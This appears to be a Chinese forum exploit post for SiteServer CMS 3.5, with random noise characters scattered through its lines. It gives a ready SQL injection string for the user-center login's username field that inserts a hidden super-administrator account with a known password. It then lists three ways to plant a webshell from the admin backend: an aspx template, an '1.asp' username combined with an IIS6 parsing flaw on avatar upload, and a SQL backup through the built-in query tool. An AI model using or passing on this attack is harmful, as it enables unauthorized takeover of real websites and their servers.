经测试秒杀最新的3.5版
: |, M F( T6 d4 T* s3 X9 tstieserver官网:www.siteserver.cn. E9 [4 ?9 L; c: m
EXP:5 \/ m$ F6 o% Y7 S. {( ?
直接访问UserCenter/login.aspx
5 n6 G/ H5 D) r* O9 V! y4 ~3 u用户名处输入:
; I! @0 N3 q" e- v% U& U. s
W6 I- U! r" P, r& H1 d123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
3 E: O" @( Y0 t/ s( R( ^: {6 D密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
2 e& t2 U9 ]- a5 j之后再访问后台SiteServer/login.aspx用插入的用户登陆) N/ J5 \( r0 c, m# j
后台拿webshell的三种方法:) G* O* @' J! ?3 H l( }7 m9 Q
一、
, a. b. w; |$ `7 U3 N站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx/ M3 j% y* j$ s5 g
二、- A/ w0 ^ V5 x/ q1 |
成员权限-》添加用户-》用户名为:1.asp
: d! Q9 Y2 l. nhttp://127.0.0.1/usercenter/
/ W: v/ B2 F0 t5 q8 Z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
4 v: o6 k! w8 z(ps:后台添加用户时不会验证是否含有非法字符)
4 h8 M: W3 e y+ K* q三、! g3 V: M6 E; f
系统工具-》实用工具-》机器参数查看
+ B' j' z; A0 z w0 c可以看到数据库类型、名称,WEB路径
8 ?# y" V# m6 Y& [" y3 M系统工具-》数据库工具-》SQL语句查询% H* D2 S0 A Q8 H/ N+ v% h
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |